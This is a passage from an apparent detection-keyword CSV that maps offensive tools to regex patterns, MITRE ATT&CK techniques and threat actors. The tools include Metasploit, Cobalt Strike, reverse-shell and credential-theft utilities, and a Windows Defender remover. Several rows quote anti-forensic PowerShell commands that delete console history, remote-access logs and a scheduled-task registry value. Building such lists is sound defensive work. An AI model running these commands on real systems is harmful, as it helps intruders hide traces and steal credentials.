BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","56996" "*remote_exploit_cmd_stager.*",".{0,1000}remote_exploit_cmd_stager\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. 
open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","56997" "*remote_exploit_demo_template.erb*",".{0,1000}remote_exploit_demo_template\.erb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","56998" "*remote_get_tor_exits_list(*",".{0,1000}remote_get_tor_exits_list\(.{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","0","N/A","N/A","9","8","718","177","2024-05-24T11:51:09Z","2011-12-17T15:14:02Z","56999" "*remote_shell.py*",".{0,1000}remote_shell\.py.{0,1000}","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1078 - T1135 - T1046 - T1087 - T1105","TA0007 - TA0008 - TA0001 - TA0011","N/A","N/A","Exploitation tool","https://github.com/guardicore/monkey","1","1","N/A","N/A","N/A","10","6779","798","2025-02-28T15:41:56Z","2015-08-30T07:22:51Z","57000" "*-remote=127.0.0.1:3000*",".{0,1000}\-remote\=127\.0\.0\.1\:3000.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","57001" 
"*RemoteDesktopPassView.zip*",".{0,1000}RemoteDesktopPassView\.zip.{0,1000}","offensive_tool_keyword","rdpv","RemoteDesktopPassView is a small utility that reveals the password stored by Microsoft Remote Desktop Connection utility inside the .rdp files.","T1110 - T1560.001 - T1555.003 - T1212","TA0006 - TA0007","N/A","Phobos - GoGoogle - Kimsuky","Credential Access","https://www.nirsoft.net/utils/remote_desktop_password.html","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A","57017" "*remote-exec *jump *",".{0,1000}remote\-exec\s.{0,1000}jump\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - 
Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","57018" "*RemoteHashRetrieval.ps1*",".{0,1000}RemoteHashRetrieval\.ps1.{0,1000}","offensive_tool_keyword","DAMP","The Discretionary ACL Modification Project: Persistence Through Host-based Security Descriptor Modification.","T1222 - T1222.002 - T1548 - T1548.002","TA0005 ","N/A","N/A","Persistence","https://github.com/HarmJ0y/DAMP","1","1","N/A","N/A","10","4","378","79","2019-07-25T21:18:37Z","2018-04-06T22:13:58Z","57019" "*-RemoteIp * -RemotePort * -Rows * -Cols * -CommandLine *.exe*",".{0,1000}\-RemoteIp\s.{0,1000}\s\-RemotePort\s.{0,1000}\s\-Rows\s.{0,1000}\s\-Cols\s.{0,1000}\s\-CommandLine\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","ConPtyShell","ConPtyShell - Fully Interactive Reverse Shell for Windows","T1059.001 - T1021.004 - T1056.003","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/ConPtyShell","1","0","N/A","N/A","10","10","1102","171","2023-01-20T10:52:52Z","2019-09-13T22:11:18Z","57020" "*RemoteKrbRelay.exe*",".{0,1000}RemoteKrbRelay\.exe.{0,1000}","offensive_tool_keyword","RemoteKrbRelay","similar to KrbRelay and KrbRelayUp but With RemoteKrbRelay this can be done remotely","T1550.004 - T1557.001 - T1021.005 - T1105","TA0008 - TA0005","N/A","N/A","Lateral Movement","https://github.com/CICADA8-Research/RemoteKrbRelay","1","1","N/A","N/A","10","6","581","90","2024-06-30T14:08:50Z","2024-06-24T17:38:46Z","57025" "*remote-method-guesser/rmg*",".{0,1000}remote\-method\-guesser\/rmg.{0,1000}","offensive_tool_keyword","remote-method-guesser","remote-method-guesser (rmg) is a Java RMI vulnerability scanner and can be used to identify and verify common security vulnerabilities on Java RMI endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - 
TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","1","N/A","N/A","6","9","860","108","2024-07-03T19:40:54Z","2019-11-04T11:37:38Z","57026" "*remote-method-guesser-master*",".{0,1000}remote\-method\-guesser\-master.{0,1000}","offensive_tool_keyword","remote-method-guesser","remote-method-guesser (rmg) is a Java RMI vulnerability scanner and can be used to identify and verify common security vulnerabilities on Java RMI endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","1","N/A","N/A","6","9","860","108","2024-07-03T19:40:54Z","2019-11-04T11:37:38Z","57027" "*RemoteNTDLL.cpp*",".{0,1000}RemoteNTDLL\.cpp.{0,1000}","offensive_tool_keyword","ntdlll-unhooking-collection","unhooking ntdll from disk - from KnownDlls - from suspended process - from remote server (fileless)","T1055 - T1055.001 - T1070 - T1070.004 - T1101 - T1574 - T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/ntdlll-unhooking-collection","1","1","N/A","N/A","9","2","188","38","2023-08-02T02:26:33Z","2023-02-07T16:54:15Z","57028" "*RemoteNTDLL.exe*",".{0,1000}RemoteNTDLL\.exe.{0,1000}","offensive_tool_keyword","ntdlll-unhooking-collection","unhooking ntdll from disk - from KnownDlls - from suspended process - from remote server (fileless)","T1055 - T1055.001 - T1070 - T1070.004 - T1101 - T1574 - T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/ntdlll-unhooking-collection","1","1","N/A","N/A","9","2","188","38","2023-08-02T02:26:33Z","2023-02-07T16:54:15Z","57029" "*remotepipelist *",".{0,1000}remotepipelist\s.{0,1000}","offensive_tool_keyword","RemotePipeList","A small tool that can list the named pipes bound on a remote system.","T1047 - T1021.006","TA0008 - 
TA0002","N/A","N/A","Discovery","https://github.com/outflanknl/C2-Tool-Collection/tree/main/Other/RemotePipeList","1","0","N/A","N/A","10","10","1213","204","2023-10-27T14:16:17Z","2022-04-22T13:43:35Z","57059" "*RemotePipeList is x64 only*",".{0,1000}RemotePipeList\sis\sx64\sonly.{0,1000}","offensive_tool_keyword","RemotePipeList","A small tool that can list the named pipes bound on a remote system.","T1047 - T1021.006","TA0008 - TA0002","N/A","N/A","Discovery","https://github.com/outflanknl/C2-Tool-Collection/tree/main/Other/RemotePipeList","1","0","#content","N/A","10","10","1213","204","2023-10-27T14:16:17Z","2022-04-22T13:43:35Z","57060" "*RemotePipeList.cna*",".{0,1000}RemotePipeList\.cna.{0,1000}","offensive_tool_keyword","RemotePipeList","A small tool that can list the named pipes bound on a remote system.","T1047 - T1021.006","TA0008 - TA0002","N/A","N/A","Discovery","https://github.com/outflanknl/C2-Tool-Collection/tree/main/Other/RemotePipeList","1","1","N/A","N/A","10","10","1213","204","2023-10-27T14:16:17Z","2022-04-22T13:43:35Z","57061" "*RemotePipeList.exe*",".{0,1000}RemotePipeList\.exe.{0,1000}","offensive_tool_keyword","RemotePipeList","A small tool that can list the named pipes bound on a remote system.","T1047 - T1021.006","TA0008 - TA0002","N/A","N/A","Discovery","https://github.com/outflanknl/C2-Tool-Collection/tree/main/Other/RemotePipeList","1","1","N/A","N/A","10","10","1213","204","2023-10-27T14:16:17Z","2022-04-22T13:43:35Z","57062" "*RemotePotato0*@splinter_code & @decoder_it*",".{0,1000}RemotePotato0.{0,1000}\@splinter_code\s\&\s\@decoder_it.{0,1000}","offensive_tool_keyword","RemotePotato0","Windows Privilege Escalation from User to Domain Admin.","T1078.002 - T1078.003 - T1078.004","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RemotePotato0","1","0","#content","N/A","10","10","1382","215","2022-12-18T01:52:53Z","2021-02-08T22:02:19Z","57063" 
"*RemotePotato0.exe*",".{0,1000}RemotePotato0\.exe.{0,1000}","offensive_tool_keyword","RemotePotato0","Windows Privilege Escalation from User to Domain Admin.","T1078.002 - T1078.003 - T1078.004","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RemotePotato0","1","1","N/A","N/A","10","10","1382","215","2022-12-18T01:52:53Z","2021-02-08T22:02:19Z","57064" "*remotereg.cna*",".{0,1000}remotereg\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of CobaltStrike beacon object files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 
Sandworm","C2","https://github.com/pwn1sher/CS-BOFs","1","1","N/A","N/A","10","10","103","22","2022-02-14T09:47:30Z","2021-01-18T08:54:48Z","57065" "*RemoteShellCodeInjection-master*",".{0,1000}RemoteShellCodeInjection\-master.{0,1000}","offensive_tool_keyword","WebSocketReverseShellDotNet","A .NET-based Reverse Shell, it establishes a link to the command and control for subsequent guidance.","T1071 - T1105","TA0011 - TA0002","N/A","N/A","C2","https://github.com/The-Hustler-Hattab/WebSocketReverseShellDotNet","1","0","N/A","N/A","10","10","1","0","2024-04-18T01:00:48Z","2023-12-03T03:35:24Z","57067" "*RemoteShellCodeInjection-master.zip*",".{0,1000}RemoteShellCodeInjection\-master\.zip.{0,1000}","offensive_tool_keyword","WebSocketReverseShellDotNet","A .NET-based Reverse Shell, it establishes a link to the command and control for subsequent guidance.","T1071 - T1105","TA0011 - TA0002","N/A","N/A","C2","https://github.com/The-Hustler-Hattab/WebSocketReverseShellDotNet","1","1","N/A","N/A","10","10","1","0","2024-04-18T01:00:48Z","2023-12-03T03:35:24Z","57068" "*remotewinenum.rb*",".{0,1000}remotewinenum\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","57069" "*RemovalofAnti-PhishingServices.reg*",".{0,1000}RemovalofAnti\-PhishingServices\.reg.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","1","N/A","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","57070" "*RemovalofWindowsDefenderAntivirus.reg*",".{0,1000}RemovalofWindowsDefenderAntivirus\.reg.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","1","N/A","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","57071" "*Remove_Privilege /Process:* /Privilege:*",".{0,1000}Remove_Privilege\s\/Process\:.{0,1000}\s\/Privilege\:.{0,1000}","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","0","N/A","N/A","N/A","10","1038","201","2023-10-06T13:17:05Z","2017-12-08T01:29:11Z","57072" 
"*Remove_SecurityComp.reg*",".{0,1000}Remove_SecurityComp\.reg.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","1","N/A","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","57073" "*RemoveDefenderTasks.reg*",".{0,1000}RemoveDefenderTasks\.reg.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","1","N/A","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","57085" "*removeexe-persistence*",".{0,1000}removeexe\-persistence.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","1","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","57086" "*Remove-Item (Get-PSreadlineOption).HistorySavePath -Force -ErrorAction SilentlyContinue*",".{0,1000}Remove\-Item\s\(Get\-PSreadlineOption\)\.HistorySavePath\s\-Force\s\-ErrorAction\sSilentlyContinue.{0,1000}","offensive_tool_keyword","Kematian Stealer","Fake WinRar site distributes malware (+stealer +miner +hvnc +ransomware) from GitHub","T1195 - 
T1566 - T1569 - T1106 - T1486 - T1113","TA0001 - TA0002 - TA0005 - TA0006 - TA0007 - TA0009 - TA0010 - TA0011 - TA0040 - TA0043","N/A","N/A","Malware","https://github[.]com/sap3r-encrypthub/encrypthub","1","0","N/A","N/A","10","7","N/A","N/A","N/A","N/A","57087" "*Remove-Item (Get-PSreadlineOption).HistorySavePath*",".{0,1000}Remove\-Item\s\(Get\-PSreadlineOption\)\.HistorySavePath.{0,1000}","offensive_tool_keyword","powershell","Delete powershell history","T1056.002 - T1566.001 - T1567.002","TA0004 - TA0040 - TA0010","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/-OMG-Credz-Plz","1","0","N/A","N/A","10","10","904","310","2024-09-14T02:34:26Z","2021-09-08T20:33:18Z","57088" "*Remove-Item *C:\Program Files*\TeamViewer\TeamViewer*_Logfile.log*",".{0,1000}Remove\-Item\s.{0,1000}C\:\\Program\sFiles.{0,1000}\\TeamViewer\\TeamViewer.{0,1000}_Logfile\.log.{0,1000}","offensive_tool_keyword","malware","observed usage of third-party tools. such as anydesk or teamviewer to access remote hosts. deletion of these logs file is suspicious and could be the actions of intruders hiding their traces","T1070","TA0005","N/A","N/A","Defense Evasion","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","57089" "*Remove-Item *C:\Users\*\AppData\Roaming\AnyDesk\connection_trace.txt*",".{0,1000}Remove\-Item\s.{0,1000}C\:\\Users\\.{0,1000}\\AppData\\Roaming\\AnyDesk\\connection_trace\.txt.{0,1000}","offensive_tool_keyword","malware","observed usage of third-party tools. such as anydesk or teamviewer to access remote hosts. 
deletion of these logs file is suspicious and could be the actions of intruders hiding their traces","T1070","TA0005","N/A","N/A","Defense Evasion","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","57090" "*Remove-Item -Path *\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt*",".{0,1000}Remove\-Item\s\-Path\s.{0,1000}\\AppData\\Roaming\\Microsoft\\Windows\\PowerShell\\PSReadLine\\ConsoleHost_history\.txt.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","57095" "*Remove-ItemProperty *HKLM:\SOFTWARE\YourSoftware\Schedule\TaskCache\Tree\* -Name *SD*",".{0,1000}Remove\-ItemProperty\s.{0,1000}HKLM\:\\SOFTWARE\\YourSoftware\\Schedule\\TaskCache\\Tree\\.{0,1000}\s\-Name\s.{0,1000}SD.{0,1000}","offensive_tool_keyword","powershell","the threat actor deleted the SD value within the Tree registry path (hide scheduled task creation)","T1562","TA0005","Tarrask Malware","HAFNIUM","Defense Evasion","https://www.microsoft.com/en-us/security/blog/2022/04/12/tarrask-malware-uses-scheduled-tasks-for-defense-evasion/","1","0","#registry","risk of False positive","9","10","N/A","N/A","N/A","N/A","57096" "*Remove-KeePassConfigTrigger*",".{0,1000}Remove\-KeePassConfigTrigger.{0,1000}","offensive_tool_keyword","Keethief","Allows for the extraction of KeePass 2.X key material from memory as well as the backdooring and enumeration of the KeePass trigger system.","T1003 - T1055 - T1059 - T1070","TA0006 - TA0005 - TA0008","N/A","EvilCorp* - APT20","Credential Access","https://github.com/GhostPack/KeeThief","1","1","N/A","N/A","10","10","944","154","2020-11-18T18:35:21Z","2016-07-10T19:11:23Z","57100" 
"*RemoveKeePassTrigger.ps1*",".{0,1000}RemoveKeePassTrigger\.ps1.{0,1000}","offensive_tool_keyword","crackmapexec","Keepass exploitations from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","57101" "*RemoveKeePassTrigger.ps1*",".{0,1000}RemoveKeePassTrigger\.ps1.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","1","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","57102" "*Remove-KeeThiefLurker *",".{0,1000}Remove\-KeeThiefLurker\s.{0,1000}","offensive_tool_keyword","Powerlurk","PowerLurk is a PowerShell toolset for building malicious WMI Event Subscriptions","T1084 - T1059.001 - T1546.003 - T1053.005","TA0003 - TA0005 - TA0002 - TA0006","N/A","N/A","Persistence","https://github.com/Sw4mpf0x/PowerLurk","1","0","N/A","N/A","10","4","384","72","2016-07-25T22:19:22Z","2016-07-13T20:07:25Z","57103" "*Remove-Module -Name PsReadline*",".{0,1000}Remove\-Module\s\-Name\sPsReadline.{0,1000}","offensive_tool_keyword","powershell","removing powershell console logging to avoid 
detection","T1070.004 - T1086 - T1562.002","TA0005 - TA0002","N/A","N/A","Defense Evasion","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","57104" "*remove-persistence*",".{0,1000}remove\-persistence.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","1","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","57105" "*Remove-Persistence.ps1*",".{0,1000}Remove\-Persistence\.ps1.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","57106" "*Remove-Persistence.ps1*",".{0,1000}Remove\-Persistence\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. 
Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","57107" "*remove-persistence-cron*",".{0,1000}remove\-persistence\-cron.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","1","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","57108" "*Remove-PoshRat*",".{0,1000}Remove\-PoshRat.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. 
Nishang is useful during all phases of penetration testing.","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","57109" "*Remove-PoshRat.ps1*",".{0,1000}Remove\-PoshRat\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","57110" "*removeRegTrace*",".{0,1000}removeRegTrace.{0,1000}","offensive_tool_keyword","AoratosWin","A tool that removes traces of executed 